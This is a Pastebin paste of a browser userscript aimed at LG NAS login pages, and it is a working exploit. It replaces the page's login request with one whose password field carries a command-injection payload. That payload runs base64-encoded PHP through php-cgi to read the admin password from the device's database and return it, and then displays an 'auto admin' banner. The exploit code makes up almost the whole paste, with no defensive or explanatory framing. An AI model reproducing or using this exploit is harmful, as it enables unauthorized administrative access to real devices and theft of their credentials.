SHARE
TWEET

test-lg-nas

pac1250 Jan 24th, 2015 1,112 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // ==UserScript==
  2. // @name           test-lg-nas
  3. // @namespace      pac1250@gmail.com
  4. // @author         pac1250@gmail.com
  5. // @version        1.2.1
  6. // @match          http://*/*/login/login.php
  7. // @include        http://*/*/login/login.php
  8. // ==/UserScript==
  9.  
  10. function main () {
  11.  
  12.         $(document).ready(function() {
  13.  
  14. /* Base64 encoded PHP :
  15. $dbh=new PDO('sqlite:/etc/nas/db/share.db');
  16. $sth=$dbh->prepare('select passwd from user where uid=\'admin\'');
  17. $sth->execute();
  18. $DB_user_info=$sth->fetchAll();
  19. $dbh=null;
  20. echo $DB_user_info[0][0];
  21. */
  22.                 var php = "JGRiaD1uZXcgUERPKCdzcWxpdGU6L2V0Yy9uYXMvZGIvc2hhcmUuZGInKTsNCiRzdGg9JGRiaC0+cHJlcGFyZSgnc2VsZWN0IHBhc3N3ZCBmcm9tIHVzZXIgd2hlcmUgdWlkPVwnYWRtaW5cJycpOw0KJHN0aC0+ZXhlY3V0ZSgpOw0KJERCX3VzZXJfaW5mbz0kc3RoLT5mZXRjaEFsbCgpOw0KJGRiaD1udWxsOw0KZWNobyAkREJfdXNlcl9pbmZvWzBdWzBdOw==";
  23.                 var magic = "xxxxx | echo \"<?php eval(base64_decode(\\\"" + php + "\\\")); ?>\"|/usr/bin/php-cgi -q";
  24.                 // overrive LG sendRequest method
  25.                 sendRequest = function(callback,data,method,url,async,sload,p_num,user,password)
  26.                 {
  27.                         $.ajax({
  28.                                 type: "POST",
  29.                                 url: url,
  30.                                 data: {
  31.                                         id:  "admin",
  32.                                         mobile: "false",
  33.                                         op_mode: "login",
  34.                                         password: magic
  35.                                 },
  36.                                 success: function(data) { callback({responseText: data}); },
  37.                                 dataType: "text"
  38.                         });
  39.                 }
  40.                 // show that hack has been installed
  41.                 $("body").before("<div style=\"background-color: #FFEEEE; border: 1px solid #000000; font-family: Verdana; padding: 1px 11px; position: fixed; right: 10px; text-decoration: blink; top: 10px;\">auto admin</div>");
  42.         });
  43. }
  44.  
  45. var script = document.createElement('script');
  46. script.appendChild(document.createTextNode('('+ main +')();'));
  47. (document.body || document.head || document.documentElement).appendChild(script);
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top